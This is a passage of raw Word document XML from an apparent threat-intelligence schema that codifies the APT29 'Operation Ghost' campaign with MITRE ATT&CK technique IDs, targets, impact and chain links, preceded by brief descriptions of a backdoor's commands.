    <w:p w14:paraId="4EE0F300" w14:textId="66B49837" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>power</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>reboot or shutdown (via previously loaded PowrProf.dll)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D72928" w14:textId="39406CAB" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cdt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>change to temporary directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6582EB1D" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reqdelay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
        <w:t>sleep for specified time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E26E083" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58CF9419" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6314F0DB" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00D70BED">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc153480857"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>T1156.001, T1078 - OPERATION GHOST The Dukes aren’t back — they never left</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="3568DF4B" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00D70BED">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D70BED" w:rsidRPr="002D1D50" w14:paraId="73A13628" w14:textId="77777777" w:rsidTr="00FD53AB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="134B2301" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="60" w:name="OLE_LINK5"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="448AA046" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15337F24" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="00387DCC" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D70BED" w:rsidRPr="00B857D7" w14:paraId="6DFC50D7" w14:textId="77777777" w:rsidTr="00FD53AB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AA79193" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59885D63" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>APT29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F738684" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="00387DCC" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D70BED" w:rsidRPr="00B857D7" w14:paraId="3317E7BF" w14:textId="77777777" w:rsidTr="00FD53AB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03B62E9D" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="007328DE" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F26DCBA" w14:textId="0337DF29" w:rsidR="00D70BED" w:rsidRPr="007328DE" w:rsidRDefault="00E52169" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E52169">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>T1021.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E52169">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Remote Services&gt;:SMB/Windows Admin Shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10EEC568" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="00387DCC" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[6] </w:t>
            </w:r>
            <w:r w:rsidRPr="007418B5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">The second attack wave that </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007418B5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Volexity</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007418B5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> observed leveraged a Microsoft Word document with a malicious embedded macro</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D70BED" w:rsidRPr="00B857D7" w14:paraId="31F57B00" w14:textId="77777777" w:rsidTr="00FD53AB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3722505F" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A721904" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="007328DE" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Russia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46367363" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="00387DCC" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Via ATT&amp;CK/TCERT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D70BED" w:rsidRPr="00B857D7" w14:paraId="30764B8B" w14:textId="77777777" w:rsidTr="00FD53AB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="317C8744" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="115E147F" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>US</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="614508FA" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="00387DCC" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[6] T</w:t>
            </w:r>
            <w:r w:rsidRPr="006F2362">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>he Dukes launched several waves of highly targeted spear phishing attacks against several U.S.-based think tanks and NGOs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D70BED" w:rsidRPr="00B857D7" w14:paraId="099890A9" w14:textId="77777777" w:rsidTr="00FD53AB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="453CDC7A" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AE30B03" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F2362">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>U.S.-based think tank</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="032A5201" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="00387DCC" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[6] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D70BED" w:rsidRPr="00B857D7" w14:paraId="5F9CDB83" w14:textId="77777777" w:rsidTr="00FD53AB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CF261E3" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39A21EAB" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:r>
              <w:t>Exfiltration (confidentiality)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B7F4F2E" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E0D4F01" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D70BED" w:rsidRPr="00B857D7" w14:paraId="0D2D74E0" w14:textId="77777777" w:rsidTr="00FD53AB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F9E1E10" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FF40DC1" w14:textId="3CC5E8CA" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20C05299" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D70BED" w:rsidRPr="00B857D7" w14:paraId="5E29F448" w14:textId="77777777" w:rsidTr="00FD53AB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23E97F2E" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FC0DE54" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="351E1575" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D70BED" w:rsidRPr="00B857D7" w14:paraId="0AB05861" w14:textId="77777777" w:rsidTr="00FD53AB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A8D52A4" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AA800F1" w14:textId="70561A26" w:rsidR="00D70BED" w:rsidRDefault="00C335AD" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>APT29_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A391390" w14:textId="0EEBDAA1" w:rsidR="00D70BED" w:rsidRDefault="000A71F1" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">This is a very brief example to demonstrate codification of attacks pivoting through initial access platform. </w:t>
            </w:r>
            <w:r w:rsidR="00DF2B31">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>APT29_001 will receive the data collected and exfiltrate.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D70BED" w:rsidRPr="00B857D7" w14:paraId="49F0B167" w14:textId="77777777" w:rsidTr="00FD53AB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A3B2548" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A11FCCB" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F1BD614" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D70BED" w:rsidRPr="00B857D7" w14:paraId="59F2D355" w14:textId="77777777" w:rsidTr="00FD53AB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31D2AB17" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79FA4FB1" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2016</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12D03E4D" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[6] Wave 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="60"/>
    </w:tbl>
    <w:p w14:paraId="53A24908" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="00AC7A85" w:rsidRDefault="00D70BED" w:rsidP="00D70BED"/>
    <w:p w14:paraId="13D899FE" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00D70BED">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10201" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="436"/>
        <w:gridCol w:w="1794"/>
        <w:gridCol w:w="2660"/>
        <w:gridCol w:w="728"/>
        <w:gridCol w:w="591"/>
        <w:gridCol w:w="653"/>
        <w:gridCol w:w="18"/>
        <w:gridCol w:w="1053"/>
        <w:gridCol w:w="2268"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D70BED" w:rsidRPr="002D1D50" w14:paraId="72628362" w14:textId="77777777" w:rsidTr="00E545CD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="436" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="77984FD4" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="61" w:name="OLE_LINK4"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="293B7ED0" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6A7CC2B5" w14:textId="3236243C" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00235021">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>APT29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
